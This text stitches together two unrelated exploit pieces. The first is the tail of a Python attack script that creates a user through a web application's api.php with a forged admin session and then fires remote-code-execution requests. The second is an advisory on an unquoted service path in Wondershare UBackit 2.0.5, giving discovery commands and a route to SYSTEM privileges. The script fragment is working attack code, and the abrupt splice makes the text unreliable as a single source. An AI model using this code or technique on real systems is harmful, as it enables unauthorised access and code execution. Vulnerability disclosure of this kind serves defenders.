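            r = s.post(f"{TARGET}/module/api.php?mobile/set_user_information",
                       data={"groups": groups, "username": user, "operation": "0",
                             "password": password, "capacity": ""})
            if "create user successful!" in str(r.content, "utf8"):
                print(r.content)
                break
            continue

        r = s.get(RCEs[args.rce])
        content = str(r.content, "utf-8")
        # The login page marker means the forged admin session was rejected;
        # try the next admin user in that case.
        if "<!--user login-->" not in content:
            print(content)
            raise SystemExit(0)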
# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/ubackit_full8767.exe
# Tested Version: 2.0.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """

Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto


# Service info:

C:\>sc qc wsbackup
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: wsbackup
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : Wondershare wsbackup Service
 DEPENDENCIES :
 SERVICE_START_NAME : LocalSystem

#Exploit:

The service starts automatically as LocalSystem and its BINARY_PATH_NAME is unquoted and contains spaces, so the Service Control Manager resolves it the way CreateProcess does, trying each space-delimited prefix before the full path: C:\Program.exe, then C:\Program Files\Wondershare\Wondershare.exe, and only then the real wsbackup.exe. A local user who can create a file under one of those names (i.e. who has write access to C:\ or to C:\Program Files\Wondershare\) gets it executed as SYSTEM at the next service start or reboot. Default Windows ACLs do not grant standard users file-creation rights in those directories, so exploitability depends on weakened permissions there; verify with icacls before treating this as a working privilege escalation.